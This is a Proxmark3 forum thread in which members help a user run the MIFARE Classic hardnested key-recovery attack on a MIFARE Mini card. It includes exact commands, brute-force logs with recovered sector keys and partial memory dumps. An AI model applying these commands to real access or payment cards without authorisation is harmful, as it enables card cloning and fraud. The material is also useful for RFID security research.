Mifare Mini VS Mifare Classic

gaucho · 2017-09-25 13:35:50

Long time since I don't work on RFID,
please give me some help to put me back on the right way:

I use PM3 with the Automatic Mifare crack Script.
The script works fine with the old card but it doesn't work with the new one.

old one: nxp Mifare Classic 1k/Mifare Plus(4 byte UID) 2K SL1 (ATQA=0004, SAK=08)

new one: nxp Mifare Mini (ATQA=0004, SAK=09)

Is it there an attack for this tag?

note1: I can't phisically sniff between the reader and the tag

note2: my current loaded version of PM3 firmware is old.

iceman · 2017-09-25 14:00:34

O my, Gaucho, now that was long time indeed. Welcome back! I'm happy to see you here.

You need to read up on whats called hardnested attack which is the attack that works against a Mifare classic tag which has improved prng and no ACK-bug.

You find it implemented in the latest source. compile/flash and enjoy the enhancements.

You also find a new repo based on your old PM3Gui. Feel free to do your magic

gaucho · 2017-09-25 14:35:03

Thank you Roel, I will try it and I will give a feedback

iceman · 2017-09-25 14:40:31

haha, no, sorry, I'm not Roel...
but I became admin

gaucho · 2017-09-25 16:39:11

oh! Ciao Iceman, nice to meet you again.
Sorry I read "Administrator" and I didn't read "iceman", i'm becoming old and dumb.

marshmellow · 2017-09-25 23:16:22

welcome back gaucho

gaucho · 2017-09-26 10:32:49

Ciao marshmellow, nice to see you too.

I downloaded the compiled version from this thread: http://www.proxmark.org/forum/viewtopic.php?id=3975
I selected last official version in the Google drive folder.

I had some problems updating with fullimage. I had to boot some times with button pressed, then installed the old working version, then installed the bootloader of the new version, then installed the fullimage.
Finally it seems correctly updated!

I found on github this: https://github.com/Proxmark/Gaucho-GUI
the strange fact is that in my local folder I have another version of the tool developed in vb.net with a more updated xml configuration file.
Where is the updated xml file located? on github I see an empty xml file
If you don't have it, we can think to use my old one and start from it in order to update it? where is the thread about this discussion?

I tried the hardnested attack.
I get the following, but may be I didn't understood how to use it.

proxmark3> hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
--target block no: 50, target key type:B, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0



 time    | #nonces | Activity                                                | expected to brute force
         |         |                                                         | #states         | time
------------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
       0 |       0 | Brute force benchmark: 249 million (2^27.9) keys/s      | 140737488355328 |    7d
       2 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |    7d
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Can't select card (UID)
       6 |       0 | Writing acquired nonces to binary file nonces.bin       | 140737488355328 |    7d
       7 |     112 | Apply bit flip properties                               |    616831057920 | 41min
       8 |     223 | Apply bit flip properties                               |    304204513280 | 20min
#db# AcquireNonces: Can't select card (UID)
       9 |     334 | Apply bit flip properties                               |    118500147200 |  8min
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
      11 |     445 | Apply bit flip properties                               |     90291929088 |  6min
      12 |     555 | Apply bit flip properties                               |     45307748352 |  3min
      13 |     666 | Apply bit flip properties                               |     45307748352 |  3min
      14 |     776 | Apply bit flip properties                               |     45307748352 |  3min
#db# AcquireNonces: Can't select card (ALL)
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
      15 |     885 | Apply bit flip properties                               |     20603797504 |   83s
      16 |     995 | Apply bit flip properties                               |     20603797504 |   83s
      17 |    1104 | Apply bit flip properties                               |     20603797504 |   83s
      21 |    1213 | Apply Sum property. Sum(a0) = 120                       |      2457400832 |   10s
      22 |    1324 | Apply bit flip properties                               |      2457400832 |   10s
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
      24 |    1435 | Apply bit flip properties                               |      2457400832 |   10s
#db# AcquireNonces: Can't select card (UID)
      25 |    1543 | Apply bit flip properties                               |      2457400832 |   10s
      25 |    1543 | (Ignoring Sum(a8) properties)                           |      2457400832 |   10s
      30 |    1543 | Starting brute force...                                 |      2457400832 |   10s
      41 |    1543 | Brute force phase completed. Key found: d01afeeb890a    |               0 |    0s

NOTE1: the found key is not usable to read block 50

NOTE2: I tried to use the key A A0A1A2A3A4A5 to read block 0 but I get authentication error. I think they changed the default password to read block 0. Is it possible? I understood that hardnested hattack works only if you know at least one key. Correct?

iceman · 2017-09-26 11:10:18

Regarding the Gaucho-GUI, this is the new repo which is to be using c# instead of the vb.net. It is different than yours, the settings.xml is now called: pm3commands.xml https://github.com/Proxmark/Gaucho-GUI/ … mmands.xml
The project is quite stale but uses your original ideas.

Regarding hardnested,
It needs one known key to work and maybe the accessrights is not right for the found key to work?

gaucho · 2017-09-26 14:04:24

iceman wrote:

Regarding hardnested,
It needs one known key to work and maybe the accessrights is not right for the found key to work?

sorry, i was wrong: the block0 can be correctly read with password a0a1a2a3a4a5

so, how would you proceed for this exploit?

did I understood fine the usage? If i know key A of block0 and i want key B of block 50 i should use the following command:

 hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s

p.s. offtopic: the xml in the github is almost empty, while last xml file prepared by asper is much more complete, as you can see in the annexed file: tool+xml

Last edited by gaucho (2017-09-26 14:43:08)

iceman · 2017-09-26 14:26:57

Gaucho-Repo is setup but only 0xFFFF did some additions. It was suppose to bring order of the zip-files with your original sourcecode floating around on internet. So yes, the pm3commands.xml needs to be filled with data Feel free to contribute.

The hardnested is called the way you did.

hf mf hardnested 0 A A0A1A2A3A4A5 50 B

you can add the  's' - slow parameter if you need it.  You don't need 'w'

The attacked worked for you but the KEY B might not be allowed to r/w to the block-sector.
I'm not sure what you mean with "proceed for this exploit"...
You will do same as for all Mifare classic cards. Get all keys (both A/B) dump the card, ... you know, usual stuff

gaucho · 2017-09-26 14:48:20

iceman wrote:

The attacked worked for you but the KEY B might not be allowed to r/w to the block-sector.

ok, I corrected previous post: the key for block 0 is a0a1a2a3a4a5 and it works, while found passkey for block 50 (A and B) does not allows to read the data. This is strange cause on the old tag the block50 can be wrote... I could try with other blocks...

proxmark3> hf mf hardnested 0 A a0a1a2a3a4a5 50 A w s
--target block no: 50, target key type:A, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0



 time    | #nonces | Activity                                                | expected to brute force
         |         |                                                         | #states         | time
------------------------------------------------------------------------------------------------------
       0 |       0 | Start using 4 threads and AVX SIMD core                 |                 |
       0 |       0 | Brute force benchmark: 164 million (2^27.3) keys/s      | 140737488355328 |   10d
       7 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   10d
      12 |       0 | Writing acquired nonces to binary file nonces.bin       | 140737488355328 |   10d
#db# AcquireNonces: Can't select card (UID)
      13 |     112 | Apply bit flip properties                               |    362125426688 | 37min
      14 |     224 | Apply bit flip properties                               |    342383001600 | 35min
      15 |     336 | Apply bit flip properties                               |    231093567488 | 24min
      16 |     448 | Apply bit flip properties                               |    117451595776 | 12min
#db# AcquireNonces: Can't select card (UID)
      17 |     559 | Apply bit flip properties                               |     86514655232 |  9min
      18 |     670 | Apply bit flip properties                               |     81467498496 |  8min
      20 |     781 | Apply bit flip properties                               |     59585695744 |  6min
      21 |     891 | Apply bit flip properties                               |     56696315904 |  6min
      22 |    1000 | Apply bit flip properties                               |     56696315904 |  6min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
      23 |    1111 | Apply bit flip properties                               |     41825263616 |  4min
      24 |    1221 | Apply bit flip properties                               |     41825263616 |  4min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      25 |    1330 | Apply bit flip properties                               |     39939891200 |  4min
      30 |    1439 | Apply Sum property. Sum(a0) = 128                       |     10160185344 |   62s
      33 |    1550 | Apply bit flip properties                               |     10160185344 |   62s
      37 |    1658 | Apply bit flip properties                               |      5059532800 |   31s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      40 |    1766 | Apply bit flip properties                               |      5059532800 |   31s
      42 |    1874 | Apply bit flip properties                               |      5059532800 |   31s
      45 |    1981 | Apply bit flip properties                               |      4719508480 |   29s
      45 |    1981 | (Ignoring Sum(a8) properties)                           |      4719508480 |   29s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
      51 |    1981 | Starting brute force...                                 |      4719508480 |   29s
     114 |    1981 | Brute force phase completed. Key found: 5c8ff9990da2    |               0 |    0s

Last edited by gaucho (2017-09-26 14:48:51)

iceman · 2017-09-26 14:56:53

try block 51 and see if you get the same key? You should of course..

gaucho · 2017-09-26 15:03:45

update:
I can read only the first 5 blocks, while block 5 can not be read even if the key should be a0a1a2a3a4a5

8E7F48FF46890400C840002000000015
A5000938093809380938000500050005
00050005000500050005000500050005
00000000000061E789C1000000000000
8805D882000485220000030002051979

i should find in my hard disk the datasheet where the memory structure is defined, in order to check the write permissions

gaucho · 2017-09-26 15:07:41

iceman wrote:

try block 51 and see if you get the same key? You should of course..

yes, the key A for block 51 is the same of block 50.

iceman · 2017-09-26 15:19:01

Which command do you use to read with that key?

gaucho · 2017-09-26 15:43:30

iceman wrote:

Which command do you use to read with that key?

I'm using another reader, an SL500.

for the access bits decoding I will use this tool : http://www.proxmark.org/forum/viewtopic.php?id=1408

Last edited by gaucho (2017-09-26 15:44:26)

iceman · 2017-09-26 15:50:57

Why don't you use the proxmark3 to read the block50 with that key B?

gaucho · 2017-09-26 16:22:12

ok,it seems to be a matter of write permissions.
with key a0a1a2a3a4a5 i can read the following blocks:

0  8E7F48FF46890400C840002000000015
1  A5000938093809380938000500050005
2  00050005000500050005000500050005
3  00000000000061E789C1000000000000

4  8805D882000485220000030002051979
5
6
7  0000000000001E11EE5A000000000000

8
9
10
11 0000000000000F00FF7A000000000000

12
13
14
15 0000000000000F00FFDD000000000000

16 
17
18
19 0000000000004B44BB5A000000000000

20
21
22
23

24
25
26
27

28
29
30
31

32
33
34
35

36
37
38
39

40
41
42
43

44
45
46
47

48
49
50
51

52
53
54
55

I tried to read block 51 with Keys obtained with the hardnested attack without success.

gaucho · 2017-09-26 16:35:01

iceman wrote:

Why don't you use the proxmark3 to read the block50 with that key B?

I did it, i get the same result:

proxmark3> hf 14a reader
 UID : 8e 7f 48 ff
ATQA : 00 04
 SAK : 09 [2]
TYPE : NXP MIFARE Mini 0.3k
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
proxmark3> hf mf rdbl 50 B d01afeeb890a
--block no:50, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 51 B d01afeeb890a
--block no:51, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 52 B d01afeeb890a
--block no:52, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 49 B d01afeeb890a
--block no:49, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3>

iceman · 2017-09-26 16:44:24

Does the accessbits calcuator say the KEY B should be able to R/W on block 50?

Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890a

hf mf rdbl 52 A 5c8ff9990da2  
hf mf rdbl 52 B d01afeeb890a

gaucho · 2017-09-26 17:53:57

iceman wrote:

Does the accessbits calcuator say the KEY B should be able to R/W on block 50?
Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890a
hf mf rdbl 52 A 5c8ff9990da2  
hf mf rdbl 52 B d01afeeb890a

Access bits for block 50 should be on block 51. Do you agree?
I tried to read block 51 without success.
I don't know how to proceed.
I suspect I miss something

marshmellow · 2017-09-26 18:19:33

I may be nuts, but if your card is a mifare mini it only has 20 blocks...

gaucho · 2017-09-26 18:27:50

marshmellow wrote:

I may be nuts, but if your card is a mifare mini it only has 20 blocks...

This have sense.
May be the reader uses two differents approaches depending on the key that it find. In one case(mifare1k) it writes block 50 and in another case (mifare mini) it writes block xxx (<20)

Are we sure mifare mini have only 20 blocks?
Edit: yes, http://www.orangetags.com/rfid-chip-datasheet/nxp-rfid-chip-datasheet/mifare/mifare-mini-datasheet/

Last edited by gaucho (2017-09-26 18:30:32)

marshmellow · 2017-09-26 18:30:41

Yep. 320 bytes, 5 sectors, 20 blocks.

gaucho · 2017-09-26 18:32:29

Is it there a script like the autopwn to get all the keys with hardnested attack?

gaucho · 2017-09-26 18:36:04

It's funny that the bruteforce finds also a key for a inexistent block. It's something related to chuck Norris

iceman · 2017-09-26 18:58:20

Doesn't make sense...
hardnested shouldnt be able to gather nonces against a non-existent block.
so, the card you have attacked must have had a block 50.

The Mini, is as stated only 5sectors ( 20 blocks ), which is why your reads to a block 50, 51 fails majorly... All normal now.
your read of the individual blocks should success until block19 (zerobased) all normal.

The found keys, try them against your sectors..

hf mf rdsc 0 a 5c8ff9990da2  
hf mf rdsc 1 a 5c8ff9990da2  
hf mf rdsc 2 a 5c8ff9990da2  
hf mf rdsc 3 a 5c8ff9990da2  
hf mf rdsc 4 a 5c8ff9990da2

There is some un-released scripts which makes hardnested behave like the nested...

piwi · 2017-09-27 19:26:14

Welcome back, Gaucho!

Idea: Mifare mini uses 5 bit only for block addressing, I.e. block 50 = block 18? Or your card isn't a Mifare mini...

iceman · 2017-09-27 20:08:30

...a wrong block read/write must respond with a NACK of sorts if following Mifare Classic protocol. ie geniune tag. But clones like fudan etc could be more tolerant with those...

Proxmark3 community

Announcement

#1 2017-09-25 13:35:50

Mifare Mini VS Mifare Classic

#2 2017-09-25 14:00:34

Re: Mifare Mini VS Mifare Classic

#3 2017-09-25 14:35:03

Re: Mifare Mini VS Mifare Classic

#4 2017-09-25 14:40:31

Re: Mifare Mini VS Mifare Classic

#5 2017-09-25 16:39:11

Re: Mifare Mini VS Mifare Classic

#6 2017-09-25 23:16:22

Re: Mifare Mini VS Mifare Classic

#7 2017-09-26 10:32:49

Re: Mifare Mini VS Mifare Classic

#8 2017-09-26 11:10:18

Re: Mifare Mini VS Mifare Classic

#9 2017-09-26 14:04:24

Re: Mifare Mini VS Mifare Classic

#10 2017-09-26 14:26:57

Re: Mifare Mini VS Mifare Classic

#11 2017-09-26 14:48:20

Re: Mifare Mini VS Mifare Classic

#12 2017-09-26 14:56:53

Re: Mifare Mini VS Mifare Classic

#13 2017-09-26 15:03:45

Re: Mifare Mini VS Mifare Classic

#14 2017-09-26 15:07:41

Re: Mifare Mini VS Mifare Classic

#15 2017-09-26 15:19:01

Re: Mifare Mini VS Mifare Classic

#16 2017-09-26 15:43:30

Re: Mifare Mini VS Mifare Classic

#17 2017-09-26 15:50:57

Re: Mifare Mini VS Mifare Classic

#18 2017-09-26 16:22:12

Re: Mifare Mini VS Mifare Classic

#19 2017-09-26 16:35:01

Re: Mifare Mini VS Mifare Classic

#20 2017-09-26 16:44:24

Re: Mifare Mini VS Mifare Classic

#21 2017-09-26 17:53:57

Re: Mifare Mini VS Mifare Classic

#22 2017-09-26 18:19:33

Re: Mifare Mini VS Mifare Classic

#23 2017-09-26 18:27:50

Re: Mifare Mini VS Mifare Classic

#24 2017-09-26 18:30:41

Re: Mifare Mini VS Mifare Classic

#25 2017-09-26 18:32:29

Re: Mifare Mini VS Mifare Classic

#26 2017-09-26 18:36:04

Re: Mifare Mini VS Mifare Classic

#27 2017-09-26 18:58:20

Re: Mifare Mini VS Mifare Classic

#28 2017-09-27 19:26:14

Re: Mifare Mini VS Mifare Classic

#29 2017-09-27 20:08:30

Re: Mifare Mini VS Mifare Classic

Board footer